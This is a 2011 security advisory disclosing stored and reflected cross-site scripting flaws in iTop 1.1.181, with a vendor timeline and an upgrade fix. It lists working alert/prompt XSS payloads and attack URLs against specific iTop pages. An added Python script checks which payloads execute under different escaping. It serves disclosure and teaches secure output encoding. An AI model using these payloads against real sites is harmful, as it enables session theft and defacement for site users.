iTop 1.1.181 Cross Site Scripting

Posted Nov 23, 2011
Authored by Tobias Glemser

iTop version 1.1.181 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | e52ffb1cee405d95328bf9b631b1b74d

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

Published: 2011/11/16
Version 1.0

Affected products:
iTop version 1.1.181, 1.2.0-RC-282 (maybe earlier versions as well)
http://sourceforge.net/projects/itop/

References:
CVE-2011-4275 - Multiple web-vulnerabilities in iTop
TC-SA-2011-02 www.tele-consulting.com/advisories/TC-SA-2011-02.txt
(used for updates)

Summary:
"IT Operations Portal: a complete open source, ITIL, web based
service management tool including a fully customizable CMDB,
a helpdesk system and a document management tool."
Several common flaws were found in iTop, namely reflected and
stored XSS.


Vulnerable Scripts:
stored XSS:
- almost every tested input field whose value is stored in the
database and later written into the HTML content of the site.
Especially where data is reformatted using JavaScript, the
sanitisation in place appears to be bypassed.

reflected XSS:
- almost every tested input field whose value is reflected in the
server's output

Examples:
stored XSS:
- add a company named "XSS <script>alert("Help Me")</script>"
- add a database server named "XSS <script>alert("Help
Me")</script>"
- import a CSV-File where one cell contains "XSS <script>alert("Help
Me")</script>"
- copy&paste data (which does the same as CSV-import) using
1;Test 1
2;Test 2
3;Test 3<script>alert("23746234243 Test")</script>"

reflected XSS (un-authenticated):

http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help Me")</script><lala="&suggest_pwd=admin

reflected XSS (authenticated):

http://$domain/iTop/pages/UI.php?auth_user=admin"><script>alert("Help Me")</script><lala="&suggest_pwd=admin

http://$domain/iTop/pages/UniversalSearch.php?c[menu]="<script>alert("Help Me")</script>"

http://$domain/iTop/pages/UI.php?c%5bmenu%5d=60&class=Note&currentId=SearchFormToAdd_document_list&description="<script>alert("Help Me")</script>"&dosearch=1&name=Acunetix&open=1&operation=search_form&org_id=3&status=draft&type=contract

http://$domain/iTop/pages/audit.php?category=%22%3Cscript%3Ealert%281%29%3C/script%3E%22&operation=errors&rule=1

http://$domain/iTop/pages/UI.php?auth_user=%22%20onmouseover%3dprompt%28949560%29%20bad%3d%22&suggest_pwd=test

http://$domain/iTop/pages/UI.php?auth_user=admin&suggest_pwd=%22%20onmouseover%3dprompt%28972137%29%20bad%3d%22
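
The following Python script is an added example; it is not part of this advisory and not iTop code. It models the two contexts the payloads above land in: a double-quoted attribute (auth_user / suggest_pwd in the login form) and page text (description, category). The two HTML templates are assumed stand-ins for the affected pages and do not reproduce iTop's markup. Each payload is rendered through an unescaped template and through htmlspecialchars-style escaping with and without quote encoding, and the result is parsed to decide whether the payload ended up as a script body, an event-handler attribute, or inert text.

```python
"""Context-aware reflection check for the XSS payloads in TC-SA-2011-02.

Added example; not part of the advisory or of iTop. The HTML templates
below are assumed stand-ins for the affected pages, not iTop's markup.
"""
from html import escape, unescape
from html.parser import HTMLParser

# Payloads from the advisory, percent-decoded.
PAYLOAD_SCRIPT = 'admin"><script>alert("Help Me")</script><lala="'   # auth_user
PAYLOAD_HANDLER = '" onmouseover=prompt(949560) bad="'               # auth_user / suggest_pwd
PAYLOAD_TEXT = '"<script>alert("Help Me")</script>"'                  # description, category

# Assumed templates: {} marks where the request parameter is interpolated.
LOGIN_TEMPLATE = ('<form action="UI.php"><input type="text" name="auth_user" value="{}">'
                  '<input type="password" name="suggest_pwd"></form>')
BODY_TEMPLATE = '<div class="search"><p>Description: {}</p></div>'


def escape_no_quotes(value):
    # Encodes only & < >: the equivalent of PHP htmlspecialchars() without ENT_QUOTES.
    return escape(value, quote=False)


def escape_all(value):
    # Encodes & < > " ' as well: htmlspecialchars($s, ENT_QUOTES).
    return escape(value, quote=True)


def render(template, value, escaper=None):
    """Interpolate `value` into `template`, optionally through `escaper`."""
    return template.format(value if escaper is None else escaper(value))


class _Sink(HTMLParser):
    """Collects <script> bodies and on* event-handler attribute values."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.script_data = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.in_script = True
        for name, value in attrs:
            if name.startswith('on'):
                self.handlers.append((tag, name, value or ''))

    def handle_endtag(self, tag):
        if tag == 'script':
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script_data.append(data)


def classify(body, marker):
    """How does `marker` (a JS call) show up in the rendered `body`?

    'script'  - inside a <script> element: executes on load
    'handler' - inside an on* attribute: executes on the event
    'text'    - present only as text or as an inert attribute value
    'absent'  - not reflected at all
    """
    sink = _Sink()
    sink.feed(body)
    sink.close()
    if any(marker in chunk for chunk in sink.script_data):
        return 'script'
    if any(marker in value for _, _, value in sink.handlers):
        return 'handler'
    return 'text' if marker in unescape(body) else 'absent'


CASES = {
    # name:                    (template, payload, escaper, marker)
    'attr_script_vulnerable':  (LOGIN_TEMPLATE, PAYLOAD_SCRIPT, None, 'alert("Help Me")'),
    'attr_script_fixed':       (LOGIN_TEMPLATE, PAYLOAD_SCRIPT, escape_all, 'alert("Help Me")'),
    'attr_handler_vulnerable': (LOGIN_TEMPLATE, PAYLOAD_HANDLER, None, 'prompt(949560)'),
    'attr_handler_no_quotes':  (LOGIN_TEMPLATE, PAYLOAD_HANDLER, escape_no_quotes, 'prompt(949560)'),
    'attr_handler_fixed':      (LOGIN_TEMPLATE, PAYLOAD_HANDLER, escape_all, 'prompt(949560)'),
    'body_script_vulnerable':  (BODY_TEMPLATE, PAYLOAD_TEXT, None, 'alert("Help Me")'),
    'body_script_fixed':       (BODY_TEMPLATE, PAYLOAD_TEXT, escape_no_quotes, 'alert("Help Me")'),
}


def run_checks():
    """Render and classify every case; returns {name: verdict}."""
    return {name: classify(render(t, p, e), m) for name, (t, p, e, m) in CASES.items()}


if __name__ == '__main__':
    for name, verdict in run_checks().items():
        print('%-26s %s' % (name, verdict))
```

The row to note is attr_handler_no_quotes: escaping only <, > and & (PHP's htmlspecialchars() without ENT_QUOTES) still leaves the onmouseover payload live inside a double-quoted attribute, while the same escaping is enough for the text-context payload. Output encoding has to match the context the value is written into, and for attribute values it must cover quotes.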

Possible solutions:
- upgrade to version 1.2 final

Disclosure Timeline:
2011/08/09 vendor contacted via contact@combodo.com
2011/08/09 initial vendor response
2011/09/06 first patch by the vendor
2011/09/12 second patch by the vendor
2011/11/16 public disclosure

Credits:
Tobias Glemser (tglemser@tele-consulting.com)
Tele-Consulting security networking training GmbH, Germany
www.tele-consulting.com

Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore Tele-Consulting shall
not be liable for any direct or indirect damages that might be
caused by using this information.
